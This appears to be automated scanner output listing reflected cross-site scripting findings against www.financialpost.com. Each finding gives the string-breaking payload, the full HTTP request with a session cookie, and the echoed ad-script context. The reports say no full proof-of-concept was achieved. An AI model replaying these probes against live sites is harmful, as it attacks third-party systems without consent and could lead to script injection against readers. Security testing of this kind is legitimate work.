P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38763
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d120'%3b5f07c23c576 was submitted in the REST URL parameter 1. This input was echoed as 1d120';5f07c23c576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1d120'%3b5f07c23c576/financials/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a363'%3be5e52d355ae was submitted in the REST URL parameter 2. This input was echoed as 5a363';e5e52d355ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials5a363'%3be5e52d355ae/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7a32'%3ba2f5d539c94 was submitted in the REST URL parameter 1. This input was echoed as a7a32';a2f5d539c94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa7a32'%3ba2f5d539c94/financials/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85990
Expires: Sun, 19 Dec 2010 03:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsa7a32';a2f5d539c94/financials/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsa7a32';a2f5d539c94;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16955960?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3c6'%3bfd6bcf5f23 was submitted in the REST URL parameter 2. This input was echoed as 4c3c6';fd6bcf5f23 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials4c3c6'%3bfd6bcf5f23/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 93245
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials4c3c6';fd6bcf5f23/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials4c3c6';fd6bcf5f23;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10193409?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6154'%3b04265ffa851 was submitted in the REST URL parameter 4. This input was echoed as e6154';04265ffa851 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039e6154'%3b04265ffa851/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76201
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps-plate/3996039e6154';04265ffa851/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps-plate;kw=3996039e6154';04265ffa851;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=59123382? ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf56e'%3bd1d11237fe0 was submitted in the REST URL parameter 5. This input was echoed as cf56e';d1d11237fe0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039/cf56e'%3bd1d11237fe0 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37971
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9749c'%3bea6b87ad49c was submitted in the REST URL parameter 1. This input was echoed as 9749c';ea6b87ad49c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news9749c'%3bea6b87ad49c/legal/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de7ae'%3bad722b91cc3 was submitted in the REST URL parameter 2. This input was echoed as de7ae';ad722b91cc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/legalde7ae'%3bad722b91cc3/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b9fe'%3beb1408074c9 was submitted in the REST URL parameter 1. This input was echoed as 3b9fe';eb1408074c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news3b9fe'%3beb1408074c9/marketing/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43306
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28044'%3bc70d3668348 was submitted in the REST URL parameter 2. This input was echoed as 28044';c70d3668348 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/marketing28044'%3bc70d3668348/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43269
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d492c'%3b18622a2ecd was submitted in the REST URL parameter 1. This input was echoed as d492c';18622a2ecd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsd492c'%3b18622a2ecd/mining/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36406
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 287dd'%3beeb5abe1ff2 was submitted in the REST URL parameter 2. This input was echoed as 287dd';eeb5abe1ff2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/mining287dd'%3beeb5abe1ff2/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d5c4'%3b688bdb9d235 was submitted in the REST URL parameter 1. This input was echoed as 4d5c4';688bdb9d235 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news4d5c4'%3b688bdb9d235/technology/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 278b5'%3b89821bbfc44 was submitted in the REST URL parameter 2. This input was echoed as 278b5';89821bbfc44 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology278b5'%3b89821bbfc44/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63693'%3b5121090781a was submitted in the REST URL parameter 1. This input was echoed as 63693';5121090781a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion63693'%3b5121090781a/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43940
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd052'%3b65c989df336 was submitted in the REST URL parameter 1. This input was echoed as bd052';65c989df336 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionbd052'%3b65c989df336/breaking-views/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37628
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a05'%3b5e640f9eda1 was submitted in the REST URL parameter 2. This input was echoed as 85a05';5e640f9eda1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/breaking-views85a05'%3b5e640f9eda1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44256
